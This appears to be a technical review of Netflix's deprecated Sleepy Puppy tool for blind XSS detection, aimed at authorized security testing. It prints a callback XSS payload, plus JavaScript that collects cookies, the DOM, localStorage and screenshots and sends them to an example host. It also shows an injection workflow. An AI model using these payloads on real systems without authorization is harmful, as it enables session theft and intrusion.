Sleepy Puppy: How Netflix Built a Callback-Based XSS Detection System That Tracked Payloads Across Time and Applications

Hook

When Netflix's security team injected XSS payloads into internal systems, they discovered some wouldn't execute until weeks later—in completely different applications than where they were injected. Traditional testing tools were blind to this problem.

Context

Traditional XSS testing follows a simple pattern: inject a payload, observe immediate execution, document the vulnerability. This works fine for reflected XSS where cause and effect are immediate, but enterprise applications rarely work in isolation. Data flows between systems—user profiles sync across services, comments get imported into admin dashboards, API responses get cached and replayed. An XSS payload injected into Application A might not execute there at all, but could surface days later in Application B's reporting interface, or weeks later when an admin reviews flagged content.
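A toy model makes the cross-application problem concrete. In this minimal Python sketch, the two "applications" are hypothetical functions that share one list as their datastore. App A escapes on output and App B does not, so the same stored payload is inert in one and live in the other. A scanner that only watches App A's responses would report nothing.

```python
import html

# Hypothetical shared datastore: App A writes to it, App B reads from it later.
comments: list[str] = []


def app_a_submit(comment: str) -> None:
    """App A stores the comment exactly as submitted."""
    comments.append(comment)


def app_a_render() -> str:
    """App A HTML-escapes on output, so the payload is inert in its own pages."""
    return "".join(f"<li>{html.escape(c)}</li>" for c in comments)


def app_b_admin_render() -> str:
    """App B (say, an admin dashboard) trusts the shared store and skips escaping."""
    return "".join(f"<tr><td>{c}</td></tr>" for c in comments)


payload = '<script src="https://sleepy-puppy.example.com/capture?id=a3f29c1b"></script>'
app_a_submit(payload)
print(app_a_render())        # escaped markup: shown as text, never executes
print(app_b_admin_render())  # raw <script> tag: runs when someone opens App B
```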

Netflix's security team faced this exact scenario at scale. With hundreds of microservices, data lakes, and internal tools consuming and displaying user-generated content, they needed a way to track where injected payloads actually executed—not just where they were injected. The solution was Sleepy Puppy, an XSS payload management framework built around a central callback server. Instead of relying on visual confirmation of alert boxes, every payload would phone home when executed, reporting its location, execution context, and environmental metadata. This architectural shift—from observation-based testing to callback-based detection—enabled discovery of vulnerabilities that would otherwise remain hidden in the gaps between applications.

Technical Insight


Sleepy Puppy's architecture centers on three core components: the Flask management server, injectable payloads with embedded callbacks, and PuppyScripts that customize what data gets collected. The payload injection workflow is elegantly simple. When you create an assessment in Sleepy Puppy, it generates a unique payload containing a script tag that loads JavaScript from the Sleepy Puppy server. Here's what a typical payload looks like:

<script src="https://sleepy-puppy.example.com/capture?id=a3f29c1b"></script>
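Tracking works because every payload carries an ID tied to where it was injected. Below is a minimal sketch of that bookkeeping. It assumes the 8-hex-character ID shape of the example above. `issue_payload`, `render_payloads`, and the in-memory `registry` dict (standing in for the database) are hypothetical and are not Sleepy Puppy's code.

```python
import secrets

CALLBACK_BASE = "https://sleepy-puppy.example.com/capture"  # illustrative endpoint


def new_payload_id() -> str:
    """Random 8-hex-character ID, the same shape as 'a3f29c1b' above."""
    return secrets.token_hex(4)


def render_payloads(payload_id: str) -> dict[str, str]:
    """Wrap one callback URL in a few common injection contexts."""
    tag = f'<script src="{CALLBACK_BASE}?id={payload_id}"></script>'
    return {
        "script_tag": tag,
        # Closes a double-quoted attribute and its element first
        "attr_breakout": '">' + tag,
        # Escapes a <textarea>, whose content is otherwise treated as text
        "textarea_breakout": "</textarea>" + tag,
    }


def issue_payload(registry: dict, assessment_id: int, injection_point: str):
    """Record where each ID was injected so a later callback can be traced back."""
    payload_id = new_payload_id()
    while payload_id in registry:  # regenerate on the rare collision
        payload_id = new_payload_id()
    registry[payload_id] = {
        "assessment_id": assessment_id,
        "injection_point": injection_point,
    }
    return payload_id, render_payloads(payload_id)
```

Every variant embeds the same ID. A callback therefore reveals which injection point it came from, whichever page it eventually fires on.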

When this payload executes—whether immediately or months later—the browser makes a request to the Sleepy Puppy server. The server responds with a dynamically generated PuppyScript that collects environmental data and sends it back. A basic PuppyScript implementation might look like this:

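(function() {
    // payload_id is assumed to be templated in server-side. HttpOnly cookies
    // are invisible to document.cookie and will never appear in a capture.
    var payload_data = {
        url: window.location.href,
        cookies: document.cookie,
        dom: document.documentElement.outerHTML,
        referrer: document.referrer,
        user_agent: navigator.userAgent,
        payload_id: 'a3f29c1b'
    };

    // POST the report instead of packing it into an image beacon's URL: the DOM
    // plus a screenshot data URL easily exceeds URL length limits. A text/plain
    // body keeps this a CORS "simple" request, so no preflight is needed.
    function send(data) {
        var xhr = new XMLHttpRequest();
        xhr.open('POST', 'https://sleepy-puppy.example.com/callback', true);
        xhr.setRequestHeader('Content-Type', 'text/plain');
        xhr.send(JSON.stringify(data));
    }

    // html2canvas (assumed already loaded) re-renders the DOM onto a canvas.
    // Report without a screenshot if it is missing or fails.
    if (typeof html2canvas !== 'function') {
        return send(payload_data);
    }
    html2canvas(document.body).then(function(canvas) {
        try {
            payload_data.screenshot = canvas.toDataURL();
        } catch (e) { /* tainted canvas: skip the screenshot */ }
        send(payload_data);
    }, function() {
        send(payload_data);
    });
})();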
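On the server side, every report is untrusted input, because anyone who discovers the callback URL can send one. Below is a minimal sketch of validating a report. It assumes the JSON document the PuppyScript above builds, whether it arrives as a query parameter or a request body, and the same 8-hex-character ID format. `parse_capture` and `known_ids` are hypothetical names.

```python
import base64
import binascii
import json
import re

PAYLOAD_ID_RE = re.compile(r"[0-9a-f]{8}")  # assumed ID format, as in the example
PNG_DATA_URL = "data:image/png;base64,"      # canvas.toDataURL() defaults to PNG


def parse_capture(raw_json: str, known_ids: set) -> dict:
    """Validate one PuppyScript report and split the screenshot out as bytes."""
    data = json.loads(raw_json)
    if not isinstance(data, dict):
        raise ValueError("capture must be a JSON object")
    pid = data.get("payload_id")
    # The callback endpoint is reachable by anyone, so drop reports for IDs
    # that were never issued instead of storing attacker-supplied noise.
    if not isinstance(pid, str) or not PAYLOAD_ID_RE.fullmatch(pid) or pid not in known_ids:
        raise ValueError(f"unknown payload id: {pid!r}")
    screenshot = None
    shot = data.pop("screenshot", None)
    if shot is not None:
        if not isinstance(shot, str) or not shot.startswith(PNG_DATA_URL):
            raise ValueError("screenshot is not a PNG data URL")
        try:
            screenshot = base64.b64decode(shot[len(PNG_DATA_URL):], validate=True)
        except binascii.Error as exc:
            raise ValueError("screenshot is not valid base64") from exc
    return {"fields": data, "screenshot_png": screenshot}
```

The screenshot is split out as raw bytes so it can go to blob storage such as S3 while the remaining fields go to the database.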

The framework stores this capture data in PostgreSQL with foreign key relationships linking payloads to assessments, captures to payloads, and screenshots to captures. This relational model enables powerful queries like "show me all applications where payload X executed" or "find all captures from assessment Y that included admin cookies."
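Below is a minimal sketch of that relational model and the two queries. It uses Python's built-in `sqlite3` as a stand-in for PostgreSQL. The schema, the table and column names, and the substring match in `captures_with_cookie` are assumptions for illustration, not Sleepy Puppy's actual schema. Screenshots are omitted for brevity.

```python
import sqlite3

# SQLite stands in for PostgreSQL here; table and column names are hypothetical.
SCHEMA = """
CREATE TABLE assessments (id INTEGER PRIMARY KEY, name TEXT NOT NULL);
CREATE TABLE payloads (
    id TEXT PRIMARY KEY,
    assessment_id INTEGER NOT NULL REFERENCES assessments(id),
    injection_point TEXT NOT NULL
);
CREATE TABLE captures (
    id INTEGER PRIMARY KEY,
    payload_id TEXT NOT NULL REFERENCES payloads(id),
    url TEXT NOT NULL,
    cookies TEXT,
    captured_at TEXT NOT NULL
);
"""


def connect(path: str = ":memory:") -> sqlite3.Connection:
    conn = sqlite3.connect(path)
    conn.execute("PRAGMA foreign_keys = ON")  # SQLite does not enforce FKs by default
    conn.executescript(SCHEMA)
    return conn


def urls_where_payload_fired(conn: sqlite3.Connection, payload_id: str) -> list:
    """'Show me all applications where payload X executed.'"""
    rows = conn.execute(
        "SELECT DISTINCT url FROM captures WHERE payload_id = ? ORDER BY url",
        (payload_id,),
    )
    return [row[0] for row in rows]


def captures_with_cookie(conn: sqlite3.Connection, assessment_id: int, cookie_name: str) -> list:
    """'Find all captures from assessment Y that included a given cookie.'"""
    rows = conn.execute(
        """
        SELECT c.id, c.url
        FROM captures AS c
        JOIN payloads AS p ON p.id = c.payload_id
        WHERE p.assessment_id = ? AND instr(c.cookies, ?) > 0
        ORDER BY c.id
        """,
        (assessment_id, cookie_name + "="),  # crude substring match on document.cookie
    )
    return rows.fetchall()
```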

PuppyScripts are customizable templates stored in the database, allowing security teams to tailor data collection to their needs. Want to exfiltrate localStorage contents? Modify the PuppyScript. Need to fingerprint the JavaScript environment to determine if it's a headless browser? Add that logic. This flexibility made Sleepy Puppy adaptable to different testing scenarios without requiring code changes to the core application.
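To make the localStorage case concrete, here is a hypothetical PuppyScript stored as a template and filled in per request. Python's `string.Template` is an assumption, standing in for whatever templating the real server used. The placeholders `$callback_url` and `$payload_id` are illustrative. Passing the values through `json.dumps` produces properly quoted JavaScript string literals.

```python
import json
from string import Template

# Hypothetical PuppyScript as it might be stored in a database row.
# Any literal $ in the JavaScript would have to be written as $$.
LOCAL_STORAGE_SCRIPT = Template("""(function () {
    var items = {};
    try {
        for (var i = 0; i < localStorage.length; i++) {
            var k = localStorage.key(i);
            items[k] = localStorage.getItem(k);
        }
    } catch (e) { /* storage access can throw, e.g. under privacy settings */ }
    var xhr = new XMLHttpRequest();
    xhr.open('POST', $callback_url, true);
    xhr.setRequestHeader('Content-Type', 'text/plain');
    xhr.send(JSON.stringify({payload_id: $payload_id, local_storage: items}));
})();""")


def render_puppyscript(template: Template, callback_url: str, payload_id: str) -> str:
    """Fill a stored template; json.dumps yields safely quoted JS string literals."""
    return template.substitute(
        callback_url=json.dumps(callback_url),
        payload_id=json.dumps(payload_id),
    )
```

Swapping collection behavior then means editing a stored template row, while the Python rendering code stays unchanged.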

The REST API integration was particularly clever for automated testing. Security engineers could configure Burp Suite or ZAP to request fresh payloads from Sleepy Puppy's /api/payloads endpoint, inject them during automated crawling, then check /api/captures later to see what executed. This workflow looks like:

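import time

import requests

# Host, endpoint paths, request fields, and the auth header are illustrative.
SP_BASE = 'https://sleepy-puppy.example.com'
HEADERS = {'X-Auth-Token': 'your-token'}

# Get a fresh payload from Sleepy Puppy
response = requests.post(
    f'{SP_BASE}/api/payloads',
    json={'assessment_id': 42},
    headers=HEADERS,
    timeout=10,
)
response.raise_for_status()
payload = response.json()['payload']

# Inject it into your target application
injected = requests.post(
    'https://target-app.example.com/comments',
    data={'comment': payload},
    timeout=10,
)
injected.raise_for_status()

# Check later for captures. A blocking sleep keeps the example short; stored
# payloads may fire days later, so real pipelines poll on a schedule.
time.sleep(3600)  # wait an hour
captures_resp = requests.get(
    f'{SP_BASE}/api/captures',
    params={'assessment_id': 42},
    headers=HEADERS,
    timeout=10,
)
captures_resp.raise_for_status()

for capture in captures_resp.json():
    print(f"Payload executed at: {capture['url']}")
    # document.cookie cannot read HttpOnly cookies, so this may be partial
    print(f"Cookies captured: {capture.get('cookies', '')}")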
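A single one-hour sleep assumes payloads fire within that hour, which is exactly the assumption Sleepy Puppy was built to drop. Below is a sketch of a poller that remembers which captures it has already reported. `poll_captures` is hypothetical, and the `id` field on each capture is an assumption about the API response.

```python
import time
from typing import Callable, Iterable, List


def poll_captures(
    fetch: Callable[[], Iterable[dict]],
    seen: set,
    interval_s: float = 300.0,
    max_rounds: int = 12,
    sleep: Callable[[float], None] = time.sleep,
) -> List[dict]:
    """Return captures not reported before, polling up to max_rounds times.

    `fetch` is any zero-argument callable returning the current capture list,
    for example a wrapper around the /api/captures request above. Captures are
    de-duplicated on an 'id' field, which is an assumption about the response.
    """
    for round_no in range(max_rounds):
        fresh = [c for c in fetch() if c["id"] not in seen]
        if fresh:
            seen.update(c["id"] for c in fresh)
            return fresh
        if round_no < max_rounds - 1:
            sleep(interval_s)  # no sleep after the final empty round
    return []
```

Persist `seen` between runs and call this from a cron job or scheduler. A payload that fires three weeks later is then reported on the next run instead of being missed.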

The deployment architecture used Docker Compose to orchestrate Flask, PostgreSQL, and Nginx, with optional AWS integrations for S3 screenshot storage and SES email notifications. When a new capture arrived, Sleepy Puppy could automatically email security teams with the URL, screenshot, and DOM snapshot—turning delayed XSS detection into a near-real-time alerting system. This operational model transformed XSS testing from a manual, point-in-time activity into a continuous monitoring process.
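The notification step can be sketched with the standard library's `email.message.EmailMessage`. This is a hypothetical composer, not Sleepy Puppy's code. It only builds the message; handing it to SES, SMTP, or another transport is left out. Two details matter for captured data: header values are collapsed to a single line, and the DOM is attached as plain text rather than rendered.

```python
from email.message import EmailMessage
from typing import Optional


def _one_line(value: object) -> str:
    """Collapse whitespace so captured strings cannot inject extra header lines."""
    return " ".join(str(value).split())


def build_capture_email(capture: dict, screenshot_png: Optional[bytes],
                        sender: str, recipients: list) -> EmailMessage:
    """Compose a capture alert; delivery (SES, SMTP, ...) is left to the caller."""
    msg = EmailMessage()
    msg["Subject"] = _one_line(
        f"[XSS capture] payload {capture['payload_id']} fired at {capture['url']}")
    msg["From"] = sender
    msg["To"] = ", ".join(recipients)
    msg.set_content(
        f"Payload: {capture['payload_id']}\n"
        f"URL: {capture['url']}\n"
        f"Referrer: {capture.get('referrer', '')}\n"
        f"User agent: {capture.get('user_agent', '')}\n"
    )
    if screenshot_png:
        msg.add_attachment(screenshot_png, maintype="image", subtype="png",
                           filename=f"{capture['payload_id']}.png")
    if capture.get("dom"):
        # Attach the captured DOM as plain text rather than inlining it as HTML,
        # so a mail client does not render attacker-influenced markup.
        msg.add_attachment(capture["dom"], subtype="plain", filename="dom.txt")
    return msg
```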

Gotcha

The elephant in the room: Sleepy Puppy has been officially deprecated since July 2018. No bug fixes, no security patches, no compatibility updates for modern browsers or frameworks. The codebase uses Flask patterns and JavaScript libraries from the mid-2010s, and while it might still technically function, running unmaintained security tooling is ironic at best, dangerous at worst. Its dependencies have known vulnerabilities, and browser changes since 2018 may break screenshot capture or other collection mechanisms.

Beyond deprecation, the callback architecture has inherent limitations. Your Sleepy Puppy server must be reachable from whichever browser eventually renders the payload. Since you rarely know in advance where that will be, in practice this means running internet-facing infrastructure that needs hardening. If the payload renders behind a corporate firewall or in an air-gapped environment, callbacks won't get out unless you host the server inside that network or set up complex proxy arrangements. Additionally, the framework requires non-trivial infrastructure (PostgreSQL, proper DNS, SSL certificates, potentially AWS accounts), which is heavyweight compared to simply using Burp Collaborator or a webhook service. For quick XSS testing, Sleepy Puppy's setup overhead exceeds its value. It was built for Netflix-scale operations where hundreds of engineers were continuously testing dozens of interconnected services, not for penetration testing individual web applications.
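For contrast, a bare-bones callback receiver fits in the Python standard library. This sketch assumes reports arrive as a JSON body POSTed to a hypothetical `/callback` path. It has no TLS, authentication, persistence, or rate limiting. Treat it as an illustration of how small the core is, not as deployable infrastructure; it still has to be reachable from whichever browser renders the payload.

```python
import json
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

CAPTURES: list = []          # in-memory only; a real deployment needs a database
CAPTURES_LOCK = threading.Lock()
MAX_BODY = 5 * 1024 * 1024   # screenshots make reports large, but cap them anyway


class CallbackHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        if self.path != "/callback":
            self.send_error(404)
            return
        try:
            length = int(self.headers.get("Content-Length", "0"))
        except ValueError:
            length = -1
        if length <= 0 or length > MAX_BODY:
            self.send_error(413 if length > MAX_BODY else 400)
            return
        try:
            report = json.loads(self.rfile.read(length))
        except ValueError:  # covers malformed JSON and undecodable bytes
            report = None
        if not isinstance(report, dict):
            self.send_error(400)
            return
        report["source_ip"] = self.client_address[0]
        with CAPTURES_LOCK:
            CAPTURES.append(report)
        self.send_response(204)
        self.end_headers()

    def log_message(self, format, *args):
        pass  # silence per-request logging to stderr


def serve(host: str = "0.0.0.0", port: int = 8080) -> None:
    ThreadingHTTPServer((host, port), CallbackHandler).serve_forever()
```

A browser script that POSTs with a `text/plain` body sends a CORS "simple" request, so no preflight occurs. The receiver therefore needs no `OPTIONS` handler just to collect reports.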

Verdict

Use if: You're researching enterprise security tool architecture, studying how Netflix approached security at scale, or building a modern XSS detection system and want to understand the callback-based detection pattern that Sleepy Puppy helped popularize. It's valuable as a reference implementation and educational resource for understanding cross-application vulnerability tracking.

Skip if: You need an actual production XSS testing tool; the deprecated status makes this a non-starter for real security work. Use XSS Hunter Express for self-hosted callback-based XSS detection, Burp Collaborator if you're already in the Burp ecosystem, or build a lightweight webhook-based solution using serverless functions if you need custom behavior. Sleepy Puppy's time has passed, but its architectural insights remain relevant for anyone building security testing infrastructure.
